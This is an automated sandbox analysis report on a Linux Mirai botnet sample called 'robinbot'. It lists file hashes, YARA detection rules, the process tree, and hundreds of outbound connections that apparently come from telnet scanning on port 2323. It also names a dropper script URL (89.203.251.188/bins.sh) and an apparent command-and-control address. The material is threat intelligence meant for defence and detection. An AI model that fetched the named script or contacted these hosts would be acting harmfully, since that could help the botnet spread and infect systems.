Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
robinbot

Overview

General Information

Sample Name:robinbot
Analysis ID:756090
MD5:500009d8f68330a8f82b59884a9afe47
SHA1:575f5e6894b1a2f7a728435487666acdb9758f83
SHA256:a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample deletes itself
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Yara signature match
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample and/or dropped files contains symbols with suspicious names
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:756090
Start date and time:2022-11-29 16:32:34 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 55s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:robinbot
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Run name:Potential for more IOCs and behavior
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/0@0/0

Warnings

  • VT rate limit hit for: http://89.203.251.188/bins.sh;$
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/robinbot
PID:6224
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • robinbot (PID: 6224, Parent: 6122, MD5: 500009d8f68330a8f82b59884a9afe47) Arguments: /tmp/robinbot
    • robinbot New Fork (PID: 6225, Parent: 6224)
      • robinbot New Fork (PID: 6226, Parent: 6225)
      • robinbot New Fork (PID: 6227, Parent: 6225)
      • robinbot New Fork (PID: 6228, Parent: 6225)
        • robinbot New Fork (PID: 6230, Parent: 6228)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
robinbotSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
robinbotMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x117db:$x2: /dev/misc/watchdog
  • 0x117cd:$x3: /dev/watchdog
  • 0x1605e:$s1: LCOGQGPTGP
  • 0x15df9:$s3: CFOKLKQVPCVMP
  • 0x15de1:$s4: QWRGPTKQMP
  • 0x15d6c:$s5: HWCLVGAJ
  • 0x15f25:$s6: NKQVGLKLE
robinbotJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    robinbotJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      robinbotJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Click to see the 14 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        6227.1.0000000000400000.0000000000418000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
        • 0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        6227.1.0000000000400000.0000000000418000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x117db:$x2: /dev/misc/watchdog
        • 0x117cd:$x3: /dev/watchdog
        • 0x1605e:$s1: LCOGQGPTGP
        • 0x15df9:$s3: CFOKLKQVPCVMP
        • 0x15de1:$s4: QWRGPTKQMP
        • 0x15d6c:$s5: HWCLVGAJ
        • 0x15f25:$s6: NKQVGLKLE
        6227.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6227.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6227.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              Click to see the 58 entries

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: robinbotVirustotal: Detection: 65%Perma Link
              Source: robinbotReversingLabs: Detection: 61%
              Machine Learning detection for sample
              Source: robinbotJoe Sandbox ML: detected

              Networking

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48294
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48298
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48304
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48280
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48332
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48346
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48350
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48356
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48310
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48356
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48362
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48366
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48358
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48362
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:57518 -> 41.19.218.223:80
              Source: global trafficTCP traffic: 192.168.2.23:52822 -> 89.7.104.165:80
              Source: global trafficTCP traffic: 192.168.2.23:45694 -> 42.52.227.192:80
              Source: global trafficTCP traffic: 192.168.2.23:59786 -> 42.184.7.37:80
              Source: global trafficTCP traffic: 192.168.2.23:43154 -> 1.54.169.217:80
              Source: global trafficTCP traffic: 192.168.2.23:51766 -> 62.168.10.60:80
              Source: global trafficTCP traffic: 192.168.2.23:60452 -> 130.43.149.208:80
              Source: global trafficTCP traffic: 192.168.2.23:53296 -> 14.12.74.189:80
              Source: global trafficTCP traffic: 192.168.2.23:51174 -> 61.236.226.235:80
              Source: global trafficTCP traffic: 192.168.2.23:42628 -> 67.162.87.213:80
              Source: global trafficTCP traffic: 192.168.2.23:58512 -> 70.22.69.171:80
              Source: global trafficTCP traffic: 192.168.2.23:57016 -> 77.147.6.59:80
              Source: global trafficTCP traffic: 192.168.2.23:44714 -> 156.192.217.220:80
              Source: global trafficTCP traffic: 192.168.2.23:52954 -> 90.45.174.46:80
              Source: global trafficTCP traffic: 192.168.2.23:34446 -> 190.68.254.62:80
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 163.151.162.85:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 104.142.173.149:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 209.184.177.135:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 137.243.81.5:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.206.168.216:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 19.135.140.179:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 197.239.84.85:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 200.92.245.153:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 116.67.119.148:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 141.120.197.91:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 65.154.218.40:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 124.212.254.113:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 163.136.220.64:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 160.154.217.169:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 42.100.191.234:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.137.192.245:2323
              Source: global trafficTCP traffic: 192.168.2.23:35656 -> 189.87.192.206:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 135.149.49.5:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 147.79.64.93:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.178.111.66:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 75.55.208.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 160.142.234.100:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 173.9.184.220:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 187.224.94.159:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 105.123.130.198:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.222.104.130:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 200.214.123.249:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 54.6.154.146:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 55.85.248.107:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 65.170.196.42:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 107.89.146.145:2323
              Source: global trafficTCP traffic: 192.168.2.23:51198 -> 89.203.251.188:7267
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 143.144.130.65:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.100.246.114:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 204.213.205.118:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.70.201.148:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 114.154.146.252:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 84.126.30.181:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 72.96.228.219:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 5.249.17.203:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 29.105.195.127:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 50.40.194.3:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 162.78.6.107:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 220.202.211.41:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.36.64.44:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.131.111.14:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 23.22.98.112:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 109.11.173.177:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 223.6.247.130:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 107.233.118.154:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 110.140.165.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.179.158.49:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 105.66.194.214:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 94.26.22.117:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 119.11.139.79:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 75.26.181.151:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 213.4.250.93:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 169.173.222.182:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 48.236.86.172:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 15.192.178.237:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 79.83.63.161:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 1.136.86.171:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 67.151.50.197:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 75.6.93.112:2323
              Source: global trafficTCP traffic: 192.168.2.23:32822 -> 187.97.44.133:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 95.52.106.171:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 33.148.92.70:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.149.147.150:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 108.208.102.205:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 171.173.99.26:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 130.216.49.6:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 96.158.69.6:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 93.51.139.184:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 216.46.203.199:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 119.249.93.179:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.212.150.123:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 82.232.99.98:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 165.251.205.13:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 62.112.225.121:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.204.80.148:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 96.83.234.242:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.214.55.57:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 106.189.126.165:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.4.227.195:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 71.181.130.227:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.109.14.17:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 160.30.6.161:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.117.53.207:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 79.95.201.126:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.193.18.50:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.64.21.84:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 207.100.22.63:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.25.164.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 88.170.167.42:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 177.223.99.112:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 31.233.64.156:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 153.116.66.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 17.174.21.93:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 161.84.160.216:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 79.117.93.26:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 64.10.38.215:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 128.75.30.64:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 16.66.216.208:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 222.134.132.190:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 80.177.116.178:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 89.60.180.230:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 186.130.167.134:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 114.91.131.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 87.141.30.72:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 32.227.145.174:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 108.73.29.204:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 106.155.152.197:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 124.65.63.81:2323
              Source: global trafficTCP traffic: 192.168.2.23:54272 -> 189.216.57.108:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 11.218.149.26:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 110.210.0.7:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 157.169.77.132:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 132.161.54.74:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 5.135.137.173:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 31.220.244.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 187.192.10.153:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 3.231.89.198:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.97.197.218:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 113.38.186.195:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 89.63.29.167:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 43.38.71.86:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 71.118.231.208:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 183.250.197.133:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 181.180.110.135:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 71.148.112.115:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 70.235.235.75:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 32.52.35.23:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 221.142.142.57:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 180.211.170.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 85.231.39.47:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 183.131.151.92:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 195.34.132.90:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 50.5.252.251:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 212.233.55.201:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 75.97.244.246:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 52.180.129.119:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 67.141.38.213:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 177.133.155.80:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 116.186.50.145:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 116.212.180.80:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 62.196.12.160:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 136.8.93.180:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 164.57.193.76:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 46.167.217.53:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 98.121.27.54:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 157.95.21.205:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 43.160.254.106:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 72.228.102.105:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 94.17.137.86:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 137.106.150.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 22.136.128.97:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.35.160.212:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 71.211.243.4:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 121.110.73.27:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 33.132.113.87:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 167.158.157.57:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 189.249.205.243:2323
              Source: global trafficTCP traffic: 192.168.2.23:42946 -> 189.247.194.199:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 200.151.49.59:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 142.121.197.7:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 77.66.22.4:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 199.87.129.117:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 8.129.133.147:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 95.195.226.70:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 13.42.219.133:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 21.117.53.252:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 154.151.66.94:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 122.66.123.169:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 121.39.224.137:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 102.229.168.3:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.111.126.19:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.191.181.20:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 143.98.42.186:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 153.214.121.126:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 163.37.245.24:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 54.31.132.214:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 113.245.14.6:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 168.97.206.194:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 109.27.179.30:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 179.95.137.156:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 189.116.191.64:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 108.228.239.195:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 51.245.110.17:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 157.80.239.181:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 52.65.175.98:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 39.246.123.239:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 95.38.160.52:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.82.51.33:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 167.181.60.65:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.210.145.46:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.122.105.221:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 108.240.60.197:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 220.148.44.31:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 144.252.121.112:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.171.118.135:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 27.135.198.213:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 213.226.154.87:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 16.133.163.123:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 166.247.194.109:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 176.98.151.86:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 118.191.83.238:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.215.225.207:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 123.172.10.234:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 137.160.241.156:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 140.164.70.61:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 176.189.183.229:2323
              Source: global trafficTCP traffic: 192.168.2.23:36578 -> 187.100.5.250:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 25.158.61.237:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 93.120.73.32:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 121.151.162.233:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 154.230.112.114:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 24.178.223.210:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 188.127.51.54:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 68.42.44.95:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 89.232.237.134:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 137.98.13.32:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 100.16.103.72:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 214.199.75.211:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 163.4.151.124:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 165.216.141.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 166.231.158.138:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 134.162.203.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 97.217.0.76:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 173.78.32.4:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.130.20.252:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 16.76.40.204:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 77.110.228.69:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 159.232.28.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 133.162.195.74:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 167.241.180.160:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.144.16.201:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 39.169.161.170:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 22.253.251.152:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 138.31.232.216:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 81.164.55.227:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 211.69.184.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 197.47.245.230:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 202.188.206.186:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 179.137.100.52:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 182.19.32.242:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 94.98.36.29:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 12.28.211.180:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 157.77.58.92:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 205.218.25.88:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 99.252.11.90:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 176.173.120.82:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 86.82.172.87:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.136.212.224:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 38.12.182.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 101.251.200.37:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 206.174.59.37:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 88.85.4.247:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 40.160.100.143:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 132.90.101.151:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 28.31.41.64:2323
              Source: global trafficTCP traffic: 192.168.2.23:57892 -> 189.240.214.253:8080
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.106.171.171:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 213.28.207.62:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 44.169.176.34:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 208.49.2.235:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 87.172.47.29:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 136.150.139.165:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 170.148.57.189:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 87.231.69.247:2323
